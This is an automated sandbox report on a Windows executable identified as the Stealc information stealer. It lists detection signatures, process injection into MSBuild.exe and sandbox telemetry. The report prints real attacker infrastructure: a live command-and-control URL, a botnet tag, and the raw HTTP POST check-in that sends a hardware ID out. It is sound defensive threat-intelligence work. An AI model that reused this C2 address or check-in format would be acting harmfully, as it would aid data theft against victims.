Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aew8SXjXEb.exe

Overview

General Information

Sample name:Aew8SXjXEb.exe
renamed because original name is a hash value
Original sample name:c89c82ab6576a83a2a32bbffe44ef4d7.exe
Analysis ID:1528328
MD5:c89c82ab6576a83a2a32bbffe44ef4d7
SHA1:7a1db4e5bcdbcfa1fcd8591d2e3ee8708ab41a02
SHA256:11cb48154b2285d427e5f3bff51c1dde9f59a8b8cfd04fa4d3d3f6e4b0124d44
Tags:32exetrojan
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • Aew8SXjXEb.exe (PID: 6032 cmdline: "C:\Users\user\Desktop\Aew8SXjXEb.exe" MD5: C89C82AB6576A83A2A32BBFFE44EF4D7)
    • MSBuild.exe (PID: 2332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • WerFault.exe (PID: 1888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: Aew8SXjXEb.exe PID: 6032JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: MSBuild.exe PID: 2332JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 1 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                1.2.MSBuild.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.Aew8SXjXEb.exe.64dad8.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    1.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      0.2.Aew8SXjXEb.exe.620000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                        System Summary

                        barindex
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 62.204.41.150, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49707
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-07T19:33:15.882048+020020442431Malware Command and Control Activity Detected192.168.2.84970762.204.41.15080TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: Aew8SXjXEb.exeAvira: detected
                        Source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpackMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}
                        Source: Aew8SXjXEb.exeReversingLabs: Detection: 31%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: Aew8SXjXEb.exeJoe Sandbox ML: detected
                        Source: Aew8SXjXEb.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.8:49747 version: TLS 1.0
                        Source: Aew8SXjXEb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00639ABF FindFirstFileExW,0_2_00639ABF

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49707 -> 62.204.41.150:80
                        Source: Malware configuration extractorURLs: http://62.204.41.150/edd20096ecef326d.php
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF--
                        Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                        Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                        Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.8:49747 version: TLS 1.0
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00406280 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,1_2_00406280
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF--
                        Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/J
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/L
                        Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/S
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/Y
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php0
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php;
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpi
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpoca.
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpu
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpx&
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/z
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150E
                        Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150G
                        Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150ig
                        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_006220210_2_00622021
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0062729C0_2_0062729C
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0063D39B0_2_0063D39B
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0063572C0_2_0063572C
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0067094F0_2_0067094F
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0062CAF20_2_0062CAF2
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0063BB360_2_0063BB36
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00633C920_2_00633C92
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00621D790_2_00621D79
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0062FEF00_2_0062FEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004045C0 appears 317 times
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: String function: 00627B80 appears 49 times
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272
                        Source: Aew8SXjXEb.exe, 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe
                        Source: Aew8SXjXEb.exeBinary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe
                        Source: Aew8SXjXEb.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Aew8SXjXEb.exeStatic PE information: Section: .data ZLIB complexity 0.989946875
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@4/5@0/1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\96C2XD62.htmJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6032
                        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5ea91f23-f66c-476a-af3c-5caf6efefdecJump to behavior
                        Source: Aew8SXjXEb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Aew8SXjXEb.exeReversingLabs: Detection: 31%
                        Source: unknownProcess created: C:\Users\user\Desktop\Aew8SXjXEb.exe "C:\Users\user\Desktop\Aew8SXjXEb.exe"
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                        Source: Aew8SXjXEb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: Aew8SXjXEb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: Aew8SXjXEb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: Aew8SXjXEb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Aew8SXjXEb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: Aew8SXjXEb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: Aew8SXjXEb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Aew8SXjXEb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Aew8SXjXEb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: Aew8SXjXEb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: Aew8SXjXEb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: Aew8SXjXEb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: Aew8SXjXEb.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0041C03D
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_006271AD push ecx; ret 0_2_006271C0
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00667F0D push ecx; ret 0_2_00667F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041B035 push ecx; ret 1_2_0041B048
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
